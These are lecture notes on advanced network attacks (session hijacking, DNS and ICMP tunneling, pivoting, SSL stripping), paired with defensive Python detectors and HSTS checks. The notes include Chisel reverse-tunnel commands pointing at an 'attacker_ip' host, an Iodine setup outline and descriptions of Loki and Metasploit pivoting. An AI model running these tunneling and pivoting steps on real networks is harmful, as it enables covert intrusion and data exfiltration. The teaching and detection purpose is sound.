Week 10: Networking Hacking III – Advanced Network Exploits and Covert Techniques
Lecture Objectives
By the end of this session, students will be able to:
• Understand how TCP session hijacking undermines secure communication.
• Explain how DNS tunneling enables covert communication.
• Describe how ICMP is leveraged for stealthy data exfiltration.
• Conduct pivoting to access segmented internal networks.
• Propose effective defenses and detection strategies against these advanced threats.
What Makes an Attack "Advanced"?
• Involves protocol manipulation or covert methods not typically covered in entry-level attacks.
• Exploits the behavior of trusted network protocols.
• Often used in persistent threat models (APT) or red team simulations.
• Typically used after initial access to perform lateral movement or exfiltration without detection.
TCP Protocol Refresher
• TCP ensures ordered, reliable delivery of packets.
• Uses a 3-way handshake: SYN, SYN-ACK, ACK.
• Each connection maintains state through sequence and acknowledgment numbers.
• Attackers can exploit sequence prediction or manipulate the flow of the TCP session.
TCP Session Hijacking Overview
• An attack where an adversary takes control of a legitimate TCP session.
• Requires capturing or predicting sequence numbers to inject data.
• Common in unsecured or plaintext sessions (e.g., Telnet).
• Hijacker can issue commands or capture responses undetected.
Types of Session Hijacking
• Blind Hijacking: Attacker doesn't see response traffic but injects commands.
• Active Hijacking: Full visibility of both directions, more effective but requires MITM.
• TCP Reset Attacks: Sends spoofed RST packets to disrupt connections.
Sequence Number Prediction
• Early TCP/IP implementations used sequential or predictable Initial Sequence Numbers (ISNs).
• If an attacker can guess the ISN, they can spoof a session.
• Modern systems use randomized ISNs, but some embedded devices and IoT systems are still vulnerable.
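The ISN check an auditor would run against a legacy or embedded device before trusting it on a flat network, added here as an example (it is not from the lecture and is not Nmap's actual algorithm): given ISNs sampled from the device's own SYN/SYN-ACK segments, it looks at the deltas between consecutive values and reports whether they are constant, nearly constant, or spread across the sequence space. The sample ISN lists and the 2^16 jitter limit are constructed assumptions.

```python
"""Estimate how predictable a device's TCP Initial Sequence Numbers (ISNs) are
from a sample of its own handshakes: an audit a defender runs on legacy or
embedded gear, in the spirit of Nmap's ISN sequence analysis (this is a
simplified heuristic written for these notes, not Nmap's code)."""

SEQ_SPACE = 2 ** 32


def isn_deltas(isns):
    """Differences between consecutive ISNs, modulo 2^32 because sequence numbers wrap."""
    return [(b - a) % SEQ_SPACE for a, b in zip(isns, isns[1:])]


def classify_isns(isns, min_samples=4, jitter_limit=2 ** 16):
    """Heuristic verdict on an ISN sample:
    'constant-increment'  every delta identical (the classic sequential generator)
    'low-variance'        deltas differ by less than jitter_limit (a counter with little noise)
    'random-looking'      deltas spread widely across the sequence space
    A handful of samples cannot prove randomness; it can only rule out the obvious cases."""
    if len(isns) < min_samples:
        raise ValueError(f"need at least {min_samples} ISN samples")
    deltas = isn_deltas(isns)
    spread = max(deltas) - min(deltas)
    if len(set(deltas)) == 1:
        verdict = "constant-increment"
    elif spread < jitter_limit:
        verdict = "low-variance"
    else:
        verdict = "random-looking"
    return verdict, {"deltas": deltas, "spread": spread}


# Constructed samples (not captured from real devices).
SEQUENTIAL = [1000 + 65536 * k for k in range(6)]  # fixed 64K step per connection
JITTERY = [2_000_000 + 128_000 * k + j for k, j in enumerate([0, 37, 81, 12, 55, 90])]
RANDOMISH = [0x1F3A9C21, 0x8E02D7B4, 0x3C51E0F9, 0xA9F7463D, 0x0B86C4E2, 0x6D29F1A8]

if __name__ == "__main__":
    for name, sample in [("sequential", SEQUENTIAL), ("jittery", JITTERY), ("randomish", RANDOMISH)]:
        verdict, info = classify_isns(sample)
        print(f"{name:11} {verdict:19} spread={info['spread']}")
```

A device that lands in the first two categories is a candidate for the hijacking defenses on the next slides (isolate it, put it behind an encrypted protocol, or replace it); a "random-looking" result from a few samples is only the absence of an obvious flaw, not a proof of strength.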
Tool Highlight: Hunt
• Hunt is a command-line session hijacking tool.
• Supports watching sessions, injecting data, and desynchronizing targets.
• Requires network-level access and promiscuous NIC mode.
• Ideal for testing legacy systems or unencrypted protocols.
Defenses Against TCP Hijacking
• Prefer secure protocols (e.g., SSH over Telnet).
• Implement short session expiration policies.
• Use session binding to IP and fingerprint client parameters.
• Monitor for sudden session termination or duplicate ACKs.
DNS Tunneling Introduction
• DNS typically allowed through firewalls and proxies.
• DNS tunneling uses this to sneak data or commands through DNS queries.
• Can serve as a Command-and-Control (C2) channel for malware.
How DNS Tunneling Works
• Attacker owns authoritative name server for malicious domain.
• Victim encodes data (e.g., base64) into subdomain queries.
• Attacker decodes received queries and can reply with instructions.
• Tools often use TXT or NULL DNS records.
DNS Tunneling Tool: Iodine
• Tunnels IP traffic over DNS protocol.
• Works even when other ports are blocked.
• Encodes IP packets into DNS queries.
• Supports authentication and compression for stealth and performance.
Setting Up Iodine (Overview)
• Buy domain and configure NS to point to attacker server.
• Run iodine server on VPS (e.g., DigitalOcean).
• Configure firewall and use DNS query logging.
• Requires setup on both client and server sides.
Detection of DNS Tunneling
• Analyze DNS logs for long or frequent queries.
• Look for repeated subdomain patterns or entropy in names.
• Correlate DNS traffic with known endpoints and data rates.
• Employ machine learning for DNS anomaly detection.
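The first three detection bullets above, turned into a small log analyzer. This is an added example written for these notes, not a tool from the lecture or from any of the referenced projects. The log format (`epoch client qname qtype`), the sample lines, and the thresholds (data label length of 30 or more, entropy of 3.5 bits per character or more, TXT/NULL share of 50% or more) are assumptions chosen for illustration, and the "zone" is approximated as the last two labels instead of a public-suffix lookup.

```python
"""Flag DNS query logs that look like tunneling: long, high-entropy labels
under one zone, many queries to that zone, and heavy use of TXT/NULL types."""
import math
from collections import Counter, defaultdict

# Constructed sample log (not real traffic). Format: "<epoch> <client> <qname> <qtype>"
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 mail.example.com MX
1700000001 10.0.0.7 aGVsbG8gd29ybGQgdGhpcyBpcyBkYXRh.t.evil-tunnel.example TXT
1700000001 10.0.0.7 c2VuZCBtZSB0aGUgcGFzc3dvcmQgZmlsZQ.t.evil-tunnel.example TXT
1700000002 10.0.0.7 ZmlsZSBjb250ZW50cyBnbyBoZXJlIGFzIGJhc2U2NA.t.evil-tunnel.example TXT
1700000002 10.0.0.7 bW9yZSBleGZpbHRyYXRlZCBieXRlcyBmb2xsb3c.t.evil-tunnel.example NULL
1700000003 10.0.0.5 cdn.example.com A
"""

RARE_TYPES = {"TXT", "NULL"}  # record types tunnels favour because they carry free-form data


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str):
    """Return (zone, data_label). The zone is approximated as the last two labels
    (assumption: no public-suffix list); the data label is the longest label left
    of the zone, which is where tunnels place their encoded payload."""
    labels = qname.rstrip(".").split(".")
    zone = ".".join(labels[-2:])
    left = labels[:-2]
    return zone, (max(left, key=len) if left else "")


def analyze(log_text: str, min_len=30, min_entropy=3.5, rare_ratio=0.5) -> dict:
    """Aggregate queries per zone and attach a `suspicious` verdict to each."""
    zones = defaultdict(lambda: {"queries": 0, "rare": 0, "lens": [], "ents": [], "clients": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype = line.split()
        zone, label = split_name(qname)
        z = zones[zone]
        z["queries"] += 1
        z["clients"].add(client)
        z["lens"].append(len(label))
        z["ents"].append(shannon_entropy(label))
        if qtype.upper() in RARE_TYPES:
            z["rare"] += 1
    report = {}
    for zone, z in zones.items():
        avg_len = sum(z["lens"]) / z["queries"]
        avg_ent = sum(z["ents"]) / z["queries"]
        ratio = z["rare"] / z["queries"]
        # Either long, high-entropy labels, or a data-carrying record mix with longish labels.
        suspicious = (avg_len >= min_len and avg_ent >= min_entropy) or \
                     (ratio >= rare_ratio and avg_len >= min_len / 2)
        report[zone] = {"queries": z["queries"], "clients": len(z["clients"]),
                        "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
                        "rare_type_ratio": round(ratio, 2), "suspicious": suspicious}
    return report


if __name__ == "__main__":
    for zone, stats in analyze(SAMPLE_LOG).items():
        print(f"{zone:24} {'SUSPICIOUS' if stats['suspicious'] else 'ok':10} {stats}")
```

In production the same statistics would be computed per zone and per client over a sliding window, with the query count and bytes-per-minute compared against that client's own baseline; the thresholds here are starting points to tune, not fixed facts about tunnels.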
ICMP Protocol Refresher
• Used for diagnostics (ping = Echo Request and Echo Reply).
• Does not establish a session like TCP.
• Firewalls often permit ICMP for troubleshooting.
• Payload fields in ICMP packets can be manipulated.
ICMP Covert Channels
• Hide commands or data inside ICMP payload.
• Bypass outbound filtering rules.
• Malware may use it to report to C2 servers.
• Can be used for data leakage or keylogging output.
Example: Loki Tool
• Sends shell commands via ICMP Echo Request.
• Returns results via Echo Reply.
• Supports reverse shell and file transfers.
• Highly stealthy on misconfigured or flat networks.
Detection of ICMP Tunneling
• Monitor ICMP packet size and frequency.
• Flag ICMP with unusual payload lengths.
• Block outbound ICMP except to known test hosts.
• Use Suricata/Snort rules to match tunneling patterns.
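Detection logic for the first two bullets (payload size and frequency), as an added example that is not from the lecture or from the Loki project: it parses ICMP Echo messages, verifies the RFC 1071 checksum, and flags payload sizes outside a baseline, high-entropy payloads, and bursts of Echo Requests from one host. The baseline sizes (32 bytes for Windows ping, 56 bytes for Linux ping), the 7-bit entropy threshold, the two-requests-per-second limit, and every sample packet are constructed assumptions.

```python
"""Inspect ICMP Echo packets for signs of covert channels: payload lengths that
do not match normal ping clients, high-entropy (encrypted or compressed)
payloads, and bursts of Echo Requests from one host."""
import math
import struct
from collections import Counter, defaultdict

ECHO_REQUEST, ECHO_REPLY = 8, 0
# Assumed baseline of payload sizes from common ping clients (Windows 32, Linux 56).
BASELINE_SIZES = {32, 56}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Serialize an ICMP Echo message: type, code 0, checksum, identifier, sequence, payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Split an ICMP message into fields; a valid checksum makes the whole packet sum to zero."""
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": icmp_checksum(packet) == 0}


def byte_entropy(data: bytes) -> float:
    """Bits of entropy per byte (8.0 means every byte value equally frequent)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def flag_packet(pkt: dict, max_entropy: float = 7.0) -> list:
    """Anomaly tags for one parsed Echo message (non-Echo types are not examined)."""
    tags = []
    if pkt["type"] not in (ECHO_REQUEST, ECHO_REPLY):
        return tags
    if len(pkt["payload"]) not in BASELINE_SIZES:
        tags.append("unusual_size")
    if byte_entropy(pkt["payload"]) > max_entropy:
        tags.append("high_entropy")
    if not pkt["checksum_ok"]:
        tags.append("bad_checksum")
    return tags


def scan(records, max_per_sec: int = 2) -> dict:
    """records: iterable of (epoch_seconds, src_ip, raw_icmp_bytes).
    Returns {src_ip: sorted tags}; 'high_rate' marks hosts sending more than
    max_per_sec Echo Requests within any one-second bucket."""
    findings = defaultdict(set)
    requests_per_bucket = Counter()
    for ts, src, raw in records:
        pkt = parse_echo(raw)
        findings[src].update(flag_packet(pkt))
        if pkt["type"] == ECHO_REQUEST:
            requests_per_bucket[(src, int(ts))] += 1
    for (src, _bucket), count in requests_per_bucket.items():
        if count > max_per_sec:
            findings[src].add("high_rate")
    return {src: sorted(tags) for src, tags in findings.items()}


# --- Constructed sample traffic (not captured from a real network) -----------------
WINDOWS_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"                       # 32 bytes
LINUX_PAYLOAD = struct.pack("!Q", 1700000000) + bytes(range(0x10, 0x40))    # 56 bytes
# Stand-in for an encrypted tunnel payload: 512 bytes covering every byte value twice.
TUNNEL_PAYLOAD = bytes((i * 37 + 11) % 256 for i in range(512))

SAMPLE_RECORDS = [
    (1700000000.1, "10.0.0.5", build_echo(ECHO_REQUEST, 1, 1, WINDOWS_PAYLOAD)),
    (1700000001.1, "10.0.0.5", build_echo(ECHO_REQUEST, 1, 2, WINDOWS_PAYLOAD)),
    (1700000000.3, "10.0.0.6", build_echo(ECHO_REQUEST, 2, 1, LINUX_PAYLOAD)),
    (1700000000.2, "10.0.0.9", build_echo(ECHO_REQUEST, 3, 1, TUNNEL_PAYLOAD)),
    (1700000000.4, "10.0.0.9", build_echo(ECHO_REQUEST, 3, 2, TUNNEL_PAYLOAD)),
    (1700000000.6, "10.0.0.9", build_echo(ECHO_REQUEST, 3, 3, TUNNEL_PAYLOAD)),
]

if __name__ == "__main__":
    for src, tags in scan(SAMPLE_RECORDS).items():
        print(f"{src:10} {tags or ['ok']}")
```

The same three signals (size outside the baseline, near-random payload bytes, request rate) map directly onto Suricata or Snort rule options such as `dsize` and `threshold`, so this script doubles as a way to validate candidate rule thresholds against known-good ping traffic before deploying them.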
Introduction to Pivoting
• A post-exploitation technique for lateral movement.
• Used to reach internal networks through a compromised host.
• Simulates an attacker moving through enterprise systems.
• Vital in red teaming and APT simulations.
Types of Pivoting
• Proxy Chaining: Relay traffic via intermediaries.
• VPN Tunnels: Create a virtual network through compromised host.
• SSH Port Forwarding: Map local/remote ports securely.
• SOCKS Proxies: Dynamically route multiple protocols.
Tool Highlight: Metasploit Pivoting
• Use meterpreter sessions to forward ports and scan internal subnets.
• Built-in routing functionality.
• portfwd and route commands manage tunnels.
• Enables attacks that mimic insider threat.
Practical Use Case of Pivoting
• Web server in DMZ is compromised.
• Attacker uses it to reach internal database server.
• Database only accessible from DMZ – direct access impossible.
• Enables targeted data extraction or backdoor installation.
Challenges with Pivoting
• Adds latency and potential instability.
• Risk of detection due to increased traffic or scanning behavior.
• Requires careful coordination of tools and routes.
• Internal segmentation or egress filters may block it.
Advanced MITM: SSL Stripping Revisited
• Uses proxy between client and server.
• Downgrades secure HTTPS to HTTP transparently.
• User sees no warning if not vigilant.
• Credentials and sensitive data intercepted.
Tool: sslstrip
• Transparent proxy tool.
• Rewrites HTTPS links to HTTP.
• Captures form data, sessions, cookies.
• Requires ARP spoofing or DNS spoofing setup.
Countermeasures: HSTS and Certificate Pinning
• HSTS forces browsers to always use HTTPS.
• Certificate pinning ensures only a specific cert is trusted.
• Can prevent proxy-based MITM attacks.
• Widely adopted in modern applications.
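A checker for the HSTS half of this slide, added here as an example (not from the lecture): it parses the Strict-Transport-Security response header as defined in RFC 6797 and reports the gaps that leave a downgrade window open to a stripping proxy. The grading policy (one-year max-age, includeSubDomains, and preload all required for a clean result) is this example's own choice, and the sample header sets are constructed.

```python
"""Evaluate a site's Strict-Transport-Security (HSTS) header against RFC 6797:
it must arrive over HTTPS, carry a valid max-age, and, for durable protection
against HTTPS-to-HTTP downgrade, use a long max-age, cover subdomains, and be
eligible for browser preload lists."""

ONE_YEAR = 31536000  # seconds; the minimum max-age the browser preload list requires


def parse_hsts(value: str) -> dict:
    """Parse 'max-age=31536000; includeSubDomains; preload' into {name: value}.
    Directive names are case-insensitive; quoted values are unquoted."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    return directives


def evaluate_hsts(headers: dict, scheme: str = "https") -> dict:
    """Return {'ok': bool, 'findings': [...]} for one response.
    `headers` maps header names (any case) to values; `scheme` is how the response arrived."""
    value = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
    if value is None:
        return {"ok": False,
                "findings": ["no Strict-Transport-Security header: every visit can be downgraded"]}
    findings = []
    if scheme != "https":
        # RFC 6797 section 8.1: a browser ignores HSTS received over plain HTTP.
        findings.append("header delivered over HTTP is ignored by browsers")
    d = parse_hsts(value)
    try:
        max_age = int(d["max-age"])
    except (KeyError, ValueError):
        findings.append("max-age missing or not an integer: header is invalid")
        max_age = None
    if max_age is not None:
        if max_age == 0:
            findings.append("max-age=0 clears the policy instead of enforcing it")
        elif max_age < ONE_YEAR:
            findings.append(f"max-age {max_age} is below one year ({ONE_YEAR})")
    if "includesubdomains" not in d:
        findings.append("includeSubDomains absent: subdomains remain reachable over plain HTTP")
    if "preload" not in d:
        findings.append("preload absent: protection begins only after the first HTTPS visit")
    return {"ok": not findings, "findings": findings}


# Constructed header sets (not from any real site).
SAMPLES = {
    "strong": {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"},
    "weak": {"strict-transport-security": "max-age=300"},
    "missing": {"Content-Type": "text/html"},
}

if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        result = evaluate_hsts(hdrs)
        print(f"{name}: {'OK' if result['ok'] else 'FINDINGS'}")
        for f in result["findings"]:
            print(f"  - {f}")
```

The "preload absent" finding is the one that matters most against sslstrip-style attacks: without preloading, a user's very first connection to the site is the unprotected one, which is exactly the request a stripping proxy intercepts.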
Tunneling Through HTTP/HTTPS
• Using web protocols to mask traffic.
• CONNECT method in HTTP proxies enables TCP tunnels.
• Malware can leverage it to reach C2 servers.
• Effective in restricted corporate environments.
Tool: Chisel (TCP Tunneling over HTTP)
• Go-based reverse proxy tool.
• Lightweight and simple to use.
• Enables attackers to bridge internal ports to external systems.
• Commonly used for pivoting and remote file transfer.
Chisel Setup Example
• Server: chisel server -p 8000 --reverse (on attacker machine).
• Client: chisel client attacker_ip:8000 R:localhost:8001 (on target).
• Enables remote access to localhost:8001 via HTTP tunnel.
Detection and Prevention Strategies
• Implement strong egress filtering (restrict DNS, ICMP, HTTP).
• Deploy IDS/IPS to monitor unusual protocol behavior.
• Audit internal logs for strange tunneling activity.
• Train staff to recognize phishing and abnormal network behavior.
Legal and Ethical Considerations
• Simulating attacks must be part of a signed engagement.
• Unintentional exposure or data theft can have legal consequences.
• Ensure all tools are used in sandboxed, authorized labs.
• Focus on learning and responsible application.
Summary: Key Concepts
• TCP, DNS, and ICMP can all be covertly manipulated.
• Hijacking and tunneling provide stealth and persistence.
• Pivoting is crucial for lateral movement post-exploitation.
• Prevention requires defense-in-depth and anomaly monitoring.
References
• Offensive Security – Metasploit Unleashed (https://metasploitunleashed.com)
• Iodine DNS Tunnel Tool: https://code.kryo.se/iodine/
• Bettercap and Chisel GitHub repositories
• NIST SP 800-94: Guide to Intrusion Detection and Prevention Systems
(https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf)